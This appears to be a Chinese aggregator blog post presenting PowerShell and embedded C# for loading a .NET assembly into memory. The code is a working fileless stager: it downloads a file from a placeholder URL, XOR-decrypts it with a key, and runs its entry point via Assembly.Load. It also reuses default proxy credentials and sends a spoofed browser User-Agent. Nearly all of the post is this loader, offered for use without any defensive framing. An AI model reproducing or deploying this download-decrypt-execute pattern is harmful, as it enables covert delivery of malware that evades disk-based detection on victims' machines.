powershell 从PowerShell动态加载.Net程序集

Posted 2021-05-22

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了powershell 从PowerShell动态加载.Net程序集相关的知识，希望对你有一定的参考价值。

$Source = @"
using System;
using System.Net;
using System.Reflection;
namespace LoadAssembly {
public static class LoadAssembly {
public static void load() {
WebClient webclient = new WebClient();
IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
if (defaultProxy != null) {
    defaultProxy.Credentials = CredentialCache.DefaultCredentials;
    webclient.Proxy = defaultProxy;
}
byte[] b = webclient.DownloadData("https://xxxxx");
string key = "xxxxxxxxx";
for(int i = 0; i < b.Length; i++) { b[i] = (byte) (b[i] ^ key[i % key.Length]); }
string[] parameters = new string[] {"acesstoken"};
object[] args = new object[] {parameters};
Assembly a = Assembly.Load(b);
MethodInfo method = a.EntryPoint;
object o = a.CreateInstance(method.Name);
method.Invoke(o, args); }}}
"@

Add-Type -TypeDefinition $Source -Language CSharp
[LoadAssembly.LoadAssembly]::load()

$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)

以上是关于powershell 从PowerShell动态加载.Net程序集的主要内容，如果未能解决你的问题，请参考以下文章

Powershell 之加解密

Powershell：使用动态创建的参数运行 msiexec

修改加粗cmd和powershell命令行的中文字体

powershell电脑加域退域

Powershell从字符串中生成System.Type [重复]

在 PowerShell 中调用动态变量